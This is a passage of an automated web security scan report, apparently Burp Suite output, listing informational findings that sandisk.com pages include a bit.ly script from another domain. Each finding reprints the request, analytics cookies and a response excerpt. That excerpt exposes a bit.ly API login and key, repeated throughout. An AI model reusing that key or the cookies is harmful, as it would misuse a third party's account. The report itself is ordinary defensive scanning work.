Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.106. http://www.sandisk.com/business-solutions/sd-worm/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/benefits

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/benefits HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.107. http://www.sandisk.com/business-solutions/sd-worm/case-studies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/case-studies

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/case-studies HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.108. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/sd-worm-card

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/sd-worm-card HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.109. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/sd-worm-contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/sd-worm-contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48323
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.110. http://www.sandisk.com/business-solutions/sd-worm/sd-worm-downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/sd-worm-downloads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/sd-worm-downloads HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20267
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.111. http://www.sandisk.com/business-solutions/sd-worm/solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/sd-worm/solutions HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/sd-worm
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39762
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.112. http://www.sandisk.com/business-solutions/ssd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/ssd

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/ssd HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43483
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.113. http://www.sandisk.com/business-solutions/ssd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/ssd.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/ssd.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43488
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.114. http://www.sandisk.com/business-solutions/ssd/landing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/ssd/landing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/ssd/landing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.115. http://www.sandisk.com/business-solutions/technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/technology

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/technology HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17943
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.116. http://www.sandisk.com/business-solutions/usb-flash-drives  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37009
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.117. http://www.sandisk.com/business-solutions/usb-flash-drives.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37014
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.118. http://www.sandisk.com/business-solutions/usb-flash-drives/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.119. http://www.sandisk.com/business-solutions/usb-flash-drives/clear-case-ufd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives/clear-case-ufd.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives/clear-case-ufd.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12621


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.120. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives/core-module

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives/core-module HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36384
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.121. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/usb-flash-drives/core-module.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-solutions/usb-flash-drives/core-module.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36389
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.122. http://www.sandisk.com/consumer-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19800
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.123. http://www.sandisk.com/consumer-products/camcorder  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/camcorder

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/camcorder HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40474
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.124. http://www.sandisk.com/consumer-products/camera  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/camera

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/camera HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40733
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.125. http://www.sandisk.com/consumer-products/computing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /consumer-products/computing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /consumer-products/computing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41062
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
